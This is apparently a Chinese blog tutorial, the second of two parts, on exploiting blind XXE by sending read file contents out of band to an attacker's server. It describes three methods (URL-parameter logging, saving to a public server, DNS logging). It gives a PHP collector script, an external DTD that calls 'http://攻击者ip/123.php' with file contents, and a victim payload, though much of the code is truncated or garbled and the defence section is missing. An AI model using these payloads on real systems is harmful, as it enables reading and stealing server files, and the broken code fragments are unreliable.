可能有人会好奇我为什么非要分成两篇来分享呢?
我的考虑是学习需要循序渐进
学习也不可能一蹴而就
短暂的爆发式学习状态会让一个人丧失后续的学习动力,当然不是所有人都这样。但是绝大多数是这样的。
相信你看到这篇文章的时候,你已经掌握了 回显XXE的发现和利用
重点:
那么在回显XXE的发现的基础上我们来分享一下无回显XXE怎么去利用呢?
既然是无回显,也就是说,我输入什么内容 ,查看什么内容,我们都将看不到,对吧!
那么既然如此该怎么办呢?
好了,不卖关子了,我直接给大家点破 这个玄机:
记住:看不见不代表不存在,看不见不代表不存在
我们确实是读取到了内容,但是,只是他没有给我显示出来而已
那么目前有三种方式可以突破这个难关
看不懂没关系,读完你就懂了
1、将读取的内容,当作一个网站的访问传参值,传入到自己的网站,我们去看网站的访问日志就可以看到
2、将读取的内容,保存在自己的公网服务器
3、DNS_LOG(这个算是神器,感兴趣的可以去了解)
1)第一种操作演示和讲解
先看看PYLOAD:
然后开始分析和讲解
(1)将以下123.php和234.xml保存到攻击者的WEB服务器下
1-123.php 不用改<?PHP file_put_contents("DATA.txt",$_GET(===============================================2-234.xml 设置下攻击者IP "http://攻击者ip/123.php?id=%file;">">%all;
(2)直接发送payload给受害者
受害者POC: 设置下攻击者的IP 和 想要获取受害者数据的地址 <?xml version="1.0"?>%remote;%send;]就能读取任意文件并把数据保存到本地的data.txt文件里:
讲解:
先上帝视角略过一遍内容
我们先看受害者页面输入的内容部分:
好的接下来在看第二段
好的,123.xml也分析结束了,我们最后回到了开始部分,画黄线的就不用说了吧,他们也是代表着被调用的意思
既然,漏洞的发现和利用都会了,如果不会防御和修复的话,我怕你们给我寄刀片啊。
在这里呢,我就偷个懒吧,直接上图
至此呢~XXE算是终结了